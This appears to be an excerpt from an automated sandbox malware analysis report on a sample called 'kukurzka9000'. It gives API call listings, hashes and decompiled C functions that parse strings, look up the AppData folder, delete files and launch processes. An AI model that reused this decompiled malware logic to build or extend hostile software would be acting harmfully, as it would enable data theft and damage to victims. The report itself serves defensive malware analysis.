LocalFree.KERNEL32(00407B9D,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABB2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABBB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABC4
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B9D), ref: 0040ABCB

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$CloseFindGlobal
String ID:
API String ID: 2275475116-0
Opcode ID: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
Instruction ID: f9c1c7988c740e23ec6b3556d7cabdce8ac8e299f89005d849d6ceee94cacba7
Opcode Fuzzy Hash: 396c3cc9efd4a9f6a2a8ad3e428ea3bae641bf45c8fb29a5b1716293b6aaf1ac
Instruction Fuzzy Hash: 2DC18772900215AFDF089FA6DE45EAE7BB5EF48310F044539F905B72A0DB746D20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B27AA Relevance: 30.4, APIs: 20, Instructions: 437fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B2837

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B2886
LocalFree.KERNEL32(00000000), ref: 022B2895
LocalFree.KERNEL32(00000000), ref: 022B28A4
LocalFree.KERNEL32(00000000), ref: 022B28AF
LocalFree.KERNEL32(00000000), ref: 022B28BA
LocalFree.KERNEL32(00000000), ref: 022B29DF
LocalFree.KERNEL32(?), ref: 022B29E6
LocalFree.KERNEL32(00000000), ref: 022B2A12
LocalFree.KERNEL32(?), ref: 022B2A19
LocalFree.KERNEL32(00000000), ref: 022B2CBB
DeleteFileW.KERNEL32(?), ref: 022B2CC2
LocalFree.KERNEL32(?), ref: 022B2CC9

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
Instruction ID: 77830ca6bb72a3de030cdc600c4d449d2fbb612018f166b466b028b91a3418c4
Opcode Fuzzy Hash: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
Instruction Fuzzy Hash: D2F18C71910215EFDB06DFA6EE48AEE7BB5FF08310F144924F915B32A0DB749920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B1D2C Relevance: 30.4, APIs: 20, Instructions: 419fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B1DB9

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B1E08
LocalFree.KERNEL32(00000000), ref: 022B1E17
LocalFree.KERNEL32(00000000), ref: 022B1E26
LocalFree.KERNEL32(00000000), ref: 022B1E31
LocalFree.KERNEL32(00000000), ref: 022B1E3C
LocalFree.KERNEL32(00000000), ref: 022B1F61
LocalFree.KERNEL32(?), ref: 022B1F68
LocalFree.KERNEL32(00000000), ref: 022B1F94
LocalFree.KERNEL32(?), ref: 022B1F9B
LocalFree.KERNEL32(00000000), ref: 022B2213
DeleteFileW.KERNEL32(?), ref: 022B221A
LocalFree.KERNEL32(?), ref: 022B2221

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction ID: 0147b1c8f59988e56c0bf04a8f1a755725a381fd016bc4443bf9acdc9186fd1e
Opcode Fuzzy Hash: 14fe85006a4507c3b927e3539246f7d6684f254c4d25abfe7b05e8fd786a1328
Instruction Fuzzy Hash: 03F19F71910225EFDB06DFA6DE44AEE7BB5FF08300F004924FA15B72A0CB749920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B629A Relevance: 30.4, APIs: 20, Instructions: 419fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(?), ref: 022B63DB
LocalFree.KERNEL32(00000000), ref: 022B63E2
LocalFree.KERNEL32(?), ref: 022B63E9
LocalFree.KERNEL32(00000000), ref: 022B6551
LocalFree.KERNEL32(?), ref: 022B673A
CloseHandle.KERNEL32(?), ref: 022B6743
DeleteFileW.KERNEL32(?), ref: 022B674A
LocalFree.KERNEL32(00000000), ref: 022B6755
LocalFree.KERNEL32(?), ref: 022B6760
LocalFree.KERNEL32(00000000), ref: 022B676C
DeleteFileW.KERNEL32(?), ref: 022B6773
LocalFree.KERNEL32(?), ref: 022B677A

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$CloseHandle
String ID:
API String ID: 3365615635-0
Opcode ID: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction ID: a05e1c0f79cbee2ed377cd0a410dac8088eafde908eb897f04af7a6cd0a0ee24
Opcode Fuzzy Hash: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction Fuzzy Hash: 1BE18271910215AFEB059FE6DD84AFEBBB9EF48350F004424FA15B7264DBB49910CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7E Relevance: 30.3, APIs: 24, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404F7E(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x825d40
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
Instruction ID: 5fa1488eec15b5c1e265b2db03af03f3b622e2a9793851092692c2b0c9e4c5eb
Opcode Fuzzy Hash: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
Instruction Fuzzy Hash: 5DA1D371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB46D218B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9 Relevance: 30.3, APIs: 24, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00409BD9(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x825d40
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00409be4
0x00409bf0
0x00409bf2
0x00409bf5
0x00409bf9
0x00409bfb
0x00409bff
0x00000000
0x00409c01
0x00409c14
0x00409c18
0x00409c1c
0x00409c2e
0x00409c4a
0x00409c58
0x00409c78
0x00409c83
0x00409c8b
0x00409c9f
0x00409cae
0x00409cd7
0x00409ce2
0x00409cea
0x00409cfe
0x00409d0b
0x00409d3a
0x00409d45
0x00409d47
0x00409d4d
0x00409d55
0x00409d6c
0x00409da8
0x00409db6
0x00409db9
0x00409dbb
0x00409dbd
0x00409dc4
0x00409dc6
0x00409dc7
0x00409dcd
0x00409dd3
0x00409ddb
0x00409ddc
0x00409de1
0x00409dea
0x00409e00
0x00409e0c
0x00409e1f
0x00409e2b
0x00409e2f
0x00409e34
0x00409e3f
0x00409e47
0x00409e50
0x00409e55
0x00409e5c
0x00409e5f
0x00409e64
0x00409e67
0x00409e71
0x00409e7f
0x00409e95
0x00409e99
0x00409ed6
0x00409e9b
0x00409eaf
0x00409eb1
0x00409eb6
0x00409ecc
0x00409ed1
0x00409eb6
0x00409eda
0x00409ee3
0x00409eec
0x00409ef5
0x00409ef5
0x00409e0c
0x00409de1
0x00409efe
0x00409f07
0x00409f10
0x00409f19
0x00409f20
0x00409f27
0x00409f2d
0x00409f30
0x00000000
0x00409f30
0x00409d71
0x00409d7a
0x00409d83
0x00409d8c
0x00409d92
0x00409d94
0x00409d94
0x00000000
0x00409d94
0x00409d10
0x00409d19
0x00409d22
0x00409d28
0x00000000
0x00409d28
0x00409cb3
0x00409cbc
0x00409cc2
0x00000000
0x00409cc2
0x00409c5d
0x00409c63
0x00000000
0x00409c1e
0x00409c20
0x00409c22
0x00409c24
0x00000000
0x00000000
0x00409c28
0x00000000
0x00409c28

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
Opcode Fuzzy Hash: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69

Uniqueness

Uniqueness Score: -1.00%

Function 022B222C Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 440fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B22BB

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

StrCpyW.SHLWAPI(?,?), ref: 022B22FB
LocalFree.KERNEL32(00000000), ref: 022B2306
LocalFree.KERNEL32(00000000), ref: 022B2315
LocalFree.KERNEL32(00000000), ref: 022B2324
LocalFree.KERNEL32(00000000), ref: 022B2333
LocalFree.KERNEL32(00000000), ref: 022B233E
DeleteFileW.KERNEL32(?), ref: 022B24A4
LocalFree.KERNEL32(?), ref: 022B24AB
LocalFree.KERNEL32(00000000), ref: 022B24C3
LocalFree.KERNEL32(00000000), ref: 022B273F
LocalFree.KERNEL32(?), ref: 022B2748
LocalFree.KERNEL32(00000000), ref: 022B2756
LocalFree.KERNEL32(00000000), ref: 022B2760
DeleteFileW.KERNEL32(?), ref: 022B2797

Strings

FALSE, xrefs: 022B2659, 022B2705
TRUE, xrefs: 022B265E, 022B2669, 022B2700, 022B270D

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction ID: 17c1576ac354fb994ceeb942e0e2c23af4db2248850ecb7fc17c679364102ecc
Opcode Fuzzy Hash: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction Fuzzy Hash: E4025C71910219EFDB069FE2EE88AED7BB5FF08300F104924E911B72A0D7759960DF58

Uniqueness

Uniqueness Score: -1.00%

Function 022B693B Relevance: 27.3, APIs: 18, Instructions: 315COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B6CD6

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 022B6BE7
LocalFree.KERNEL32(?), ref: 022B6BF0
LocalFree.KERNEL32(00000000), ref: 022B6BF7
LocalFree.KERNEL32(00000000), ref: 022B6BFE
LocalFree.KERNEL32(?), ref: 022B6C07

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

ShellExecuteW.SHELL32(00000000,0040D968,?,?,00000000,00000000), ref: 022B6C37
LocalFree.KERNEL32(?), ref: 022B6C41
LocalFree.KERNEL32(?), ref: 022B6C4A
LocalFree.KERNEL32(?), ref: 022B6C51
LocalFree.KERNEL32(?), ref: 022B6C5A
LocalFree.KERNEL32(?), ref: 022B6C82
LocalFree.KERNEL32(?), ref: 022B6C8B
LocalFree.KERNEL32(?), ref: 022B6C92
LocalFree.KERNEL32(?), ref: 022B6C9B
LocalFree.KERNEL32(?), ref: 022B6CA9
LocalFree.KERNEL32(00000000), ref: 022B6CB8
LocalFree.KERNEL32(00000000), ref: 022B6CC1

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ExecuteShell$Global
String ID:
API String ID: 3422199401-0
Opcode ID: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction ID: ff76f625c5a1e01567f6165200c33b77e330ea5b3213c49159033ceccaa4b4d2
Opcode Fuzzy Hash: 2e40cf93ff22970fb201e2597e66e137a113e231ffdeba543525be583811f4b7
Instruction Fuzzy Hash: F0A12C72A10226AFDB159FE5DE48DFE77B9EF44340B004824EA05F7264DB74AD11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 022B5C99 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 022B5D2D

Strings

(vI, xrefs: 022B5D4A, 022B5D4F, 022B5D5C, 022B5D69
., xrefs: 022B5D03

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombineFreeGlobalPath
String ID: (vI$.
API String ID: 1842026532-733099710
Opcode ID: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction ID: 1668f9ae27dc6e3b8813f8c38002b84490862c1ef631b063609d892076a36eba
Opcode Fuzzy Hash: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction Fuzzy Hash: 80C17FB1D00219AFDB05DFE5DD44AEEBBBAEF88300F104429EA15B72A0DB746951CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B9D4E Relevance: 25.3, APIs: 20, Instructions: 347COMMON

Download Yara Rule

APIs

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0A0

Part of subcall function 022BA6EB: LocalFree.KERNEL32(00000000), ref: 022BA7D1
Part of subcall function 022BA6EB: LocalFree.KERNEL32(?), ref: 022BAA4D
Part of subcall function 022BA6EB: FindClose.KERNEL32(00000000), ref: 022BAA54

LocalFree.KERNEL32(?), ref: 022BA099

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000), ref: 022BA06F
LocalFree.KERNEL32(?), ref: 022BA078
LocalFree.KERNEL32(?), ref: 022BA081
LocalFree.KERNEL32(?), ref: 022BA08A
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0A9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0B2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0BB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0C4
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0CD
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0F4
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0FD
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA106
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA10F
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA11D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA126
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA12F
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA138
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA13F

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseFindGlobal
String ID:
API String ID: 1000408776-0
Opcode ID: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction ID: 8166461d8fa534d4d56ac8d3309836251950f7c3c89c77cd1df3d21e7c5646ce
Opcode Fuzzy Hash: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction Fuzzy Hash: 07C18472910215AFDB099FE6DE49EEE7BB5EF48310F044829FA05B32A0DB745D50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B914D Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction ID: b905dc336cd70ed8b30530bbbe44d8d34328af64bf2525c16dd2eb74e4456261
Opcode Fuzzy Hash: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction Fuzzy Hash: D8A1D572A10215AFEB019BEADE45EEE7BB9EF48350F104524F614F71A0CBB05D508F69

Uniqueness

Uniqueness Score: -1.00%

Function 022B44F2 Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

